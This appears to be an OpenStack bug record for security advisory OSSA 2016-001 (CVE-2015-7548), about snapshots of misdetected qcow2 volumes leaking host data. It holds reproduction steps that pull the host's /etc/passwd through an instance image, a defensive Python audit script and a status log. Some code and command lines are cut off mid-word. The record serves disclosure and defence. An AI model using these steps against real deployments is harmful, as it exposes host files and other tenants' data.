[OSSA 2016-001] Unprivileged api user can access host data using instance snapshot (CVE-2015-7548)
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Compute (nova) | Fix Released | High | Matthew Booth | |
| Kilo | Fix Released | High | Matthew Booth | |
| OpenStack Security Advisory | Fix Released | Critical | Tristan Cacqueray | |
Bug Description
There is a qcow2 format vulnerability in LibvirtDriver.
LibvirtDriver.
source_format = libvirt_
...
snapshot_
disk_path,
...
snapshot_
libvirt_
The vulnerability only exists when a user can write to a raw volume which is later erroneously detected as qcow2. This means that the vulnerability is only present on systems using the libvirt driver which have defined use_cow_
libvirt.
Unfortunately, as is clear from the context this includes all instance data which, despite being owned by the qemu user, is world readable. Additionally, because the qemu-img process is executed by nova directly, it does not benefit from any confinement by libvirt. Specifically, SELinux is not likely to be a defence on a typical deployment.
I have tested this exploit on a Fedora 23 system running devstack as of 8th Dec 2015:

1. Ensure nova.conf contains use_cow_images = False in the DEFAULT section.
2. As an unprivileged api user, do:
   $ nova boot --image cirros --flavor m1.tiny foo
3. Somewhere, run:
   $ qemu-img create -f qcow2 -o backing_
4. Ensure bad.qcow2 is available in the foo instance.
5. Log into foo, and execute as root:
   # dd if=bad.qcow2 of=/dev/vda conv=fsync
6. As an unprivileged api user, do:
   $ nova image-create foo passwd
   $ glance image-download <newly created image id> --file passwd

The unprivileged api user now has the contents of /etc/passwd from the host locally.
Mitigations:

- Nova is not vulnerable by default. The user must have configured use_cow_
- Nova configurations using ceph or lvm for instance storage are not vulnerable.
- An attacker must know the uuid of another user's instance in order to be able to access its data.
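The condition described above (a volume the deployment treats as raw, into which a guest has written bytes that qemu-img's format auto-detection would classify as qcow2 with a backing file) can be audited directly on the host. The following is an added example, not code from the bug report or from Nova: it decodes only the qcow2 header fields relevant to the advisory, flags a raw volume that carries such a header, and shows the general defensive pattern of forcing the expected format with `-f` instead of letting qemu-img probe guest-controlled data (that pattern is stated here as the principle, not as the exact upstream patch). The constructed sample volume and the `/PLACEHOLDER/...` paths are assumptions for illustration.

```python
import struct

QCOW2_MAGIC = b"QFI\xfb"   # first four bytes of every qcow2 image
HEADER_LEN = 72            # fixed part of the qcow2 version 2 header

def parse_qcow2_header(data: bytes):
    """Return (version, backing_file) if `data` starts with a qcow2 header,
    otherwise None. backing_file is None when no backing file is named."""
    if len(data) < HEADER_LEN or data[:4] != QCOW2_MAGIC:
        return None
    # offset 4: version (u32), 8: backing_file_offset (u64), 16: backing_file_size (u32)
    version, bf_offset, bf_size = struct.unpack(">IQI", data[4:20])
    if bf_offset == 0 or bf_size == 0:
        return version, None
    if bf_offset + bf_size > len(data):
        return version, "<backing_file field points outside the image>"
    return version, data[bf_offset:bf_offset + bf_size].decode("utf-8", "replace")

def audit_raw_volume(data: bytes) -> dict:
    """Audit a volume configured as raw (use_cow_images = False). Any qcow2
    header is suspicious there; one naming a backing file is the advisory's case."""
    parsed = parse_qcow2_header(data)
    if parsed is None:
        return {"suspicious": False, "reason": "no qcow2 header in raw volume"}
    version, backing = parsed
    if backing is None:
        return {"suspicious": True, "reason": f"qcow2 v{version} header in raw volume"}
    return {"suspicious": True,
            "reason": f"qcow2 v{version} header with backing file {backing!r}"}

def qemu_img_argv(subcommand, path, expected_format="raw", extra=()):
    """Build a qemu-img command line that pins the input format with -f so
    qemu-img never probes guest-written bytes to decide what the volume is."""
    return ["qemu-img", subcommand, "-f", expected_format, *extra, path]

def constructed_volume(backing_path: bytes) -> bytes:
    """Constructed sample for the audit: a minimal qcow2 v2 header with the
    backing file name stored right after the fixed header (offset 72).
    Not a valid image; only the audited fields are meaningful."""
    header = QCOW2_MAGIC + struct.pack(">IQI", 2, HEADER_LEN, len(backing_path))
    header += b"\x00" * (HEADER_LEN - len(header))
    return header + backing_path

if __name__ == "__main__":
    print(audit_raw_volume(constructed_volume(b"/PLACEHOLDER/host/file")))
    print(audit_raw_volume(b"\x00" * 512))
    print(" ".join(qemu_img_argv("info", "/PLACEHOLDER/instances/uuid/disk")))
```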
- description: updated
- Changed in ossa: status: New → Incomplete
- description: updated
- Changed in ossa: status: Incomplete → Confirmed; importance: Undecided → Critical; assignee: nobody → Tristan Cacqueray (tristan-cacqueray)
- Changed in ossa: status: Confirmed → Triaged
- Changed in ossa: status: Triaged → In Progress
- summary: "Unprivileged api user can access host data using instance snapshot" → "Unprivileged api user can access host data using instance snapshot (2015-7548)"
- summary: "Unprivileged api user can access host data using instance snapshot (2015-7548)" → "Unprivileged api user can access host data using instance snapshot (CVE-2015-7548)"
- Changed in ossa: status: In Progress → Fix Committed; information type: Private Security → Public Security
- summary: "Unprivileged api user can access host data using instance snapshot (CVE-2015-7548)" → "[OSSA 2016-001] Unprivileged api user can access host data using instance snapshot (CVE-2015-7548)"
- Changed in ossa: status: Fix Committed → Fix Released
- description: updated
- Added ndipanov to help with this one